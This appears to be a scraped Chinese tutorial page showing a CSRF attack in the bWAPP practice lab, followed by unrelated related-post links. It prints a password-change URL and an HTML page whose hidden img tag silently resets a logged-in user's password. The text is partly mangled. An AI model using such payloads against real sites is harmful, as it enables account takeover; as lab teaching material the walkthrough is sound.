如何解析CSRF漏洞

技术如何解析CSRF漏洞这篇文章给大家介绍如何解析CSRF漏洞,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。CSRF:跨站请求伪造,伪装成用户身份来执行一些非用户自愿的恶意以及非法操作CSRF和XS

本文向您介绍如何分析CSRF漏洞。内容非常详细。有兴趣的朋友可以参考一下,希望对你有帮助。

CSRF:跨站点请求伪造,伪装成用户身份执行一些非用户自愿的恶意非法操作。

CSRF和XSS的区别:

1.CSRF登录后需要操作,但XSS不需要。

2.CSRF通过伪装成可信用户来请求可信网站。

一、环境:BWAPP

第二,登录,默认账号是bee,密码是bug。

如何解析CSRF漏洞

3.从csrf中的页面选择将密码更改为1111,更改。

第四,分析网址

http://192 . 168 . 1 . 119/bwapp/csrf _ 1 . PHP?password _ new=1111 password _ conf=1111 action=change

5.注销帐户,然后再次登录。密码已更改为1111。

6.修改网址,直接访问这个地址。

http://192 . 168 . 1 . 119/bwapp/csrf _ 1 . PHP?password _ new=2222 password _ conf=2222 action=change

密码被重置为2222。

七、隐蔽使用

1.创建一个新的html页面,再次修改url地址,并将其添加到img标签下的src属性中。

!DOCTYPE html html标题标题哦,那就好。/title /head body h3好久不见h3img src=' http://192 . 168 . 1 . 119/bwapp/csrf _ 1.php?password _ new=3333 password _ conf=3333 action=change '/body/html

2.访问这个html,自动访问修改后的url,密码自动修改。

我希望在这里分享如何解决CSRF的弱点。

内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/140993.html

(0)

相关推荐

  • Mysql的卸载过程是怎么样的

    技术Mysql的卸载过程是怎么样的Mysql的卸载过程是怎么样的,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。引言很多人因为第一次安装mysql导致安装

    攻略 2021年10月25日
  • 免费抖音自助下单平台,免费自助下单平台介绍!

    技术免费抖音自助下单平台,免费自助下单平台介绍!现在玩抖音的小伙伴们越来越多了,不过自己的发布的作品没有点赞和评论确实挺遗憾的,所以很多朋友想到了,给自己的抖音账号加粉,和作品点赞评论自助下单,这样的话可以带动抖音账号的

    测评 2021年10月21日
  • 扶桑花的寓意,盆栽扶桑花一年能开几次花

    技术扶桑花的寓意,盆栽扶桑花一年能开几次花大家好扶桑花的寓意,我是紫金。朱瑾就是扶桑花,盆栽朱瑾花一年开无数次花,只要大肥大水大太阳,它就会不停冒花苞,此起彼伏,简直就是开花机器。我在北方,冬天有暖气,冬天我的朱瑾也不停

    生活 2021年10月19日
  • 老板的灵魂提问: 别人家的视频能自动播放为什么你开发的无法自动播放为什么网页上的音视频无法自动播放了

    技术老板的灵魂提问: 别人家的视频能自动播放为什么你开发的无法自动播放为什么网页上的音视频无法自动播放了 老板的灵魂提问: 别人家的视频能自动播放为什么你开发的无法自动播放为什么网页上的音视频无法自动播

    礼包 2021年12月7日
  • 粉底液怎么用具体步骤,粉底液如何使用

    技术粉底液怎么用具体步骤,粉底液如何使用粉底液的使用可以用手也可以用粉扑粉底液怎么用具体步骤。 步骤一:先把粉底液涂抹在面部额头、下巴、面颊、鼻子五个点上,如果哪个部位毛孔较粗大,那么再取少量粉底液轻轻拍打,使粉底液融入

    生活 2021年10月22日
  • Docker容器与容器云的优点有哪些

    技术Docker容器与容器云的优点有哪些本篇内容介绍了“Docker容器与容器云的优点有哪些”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅

    攻略 2021年12月13日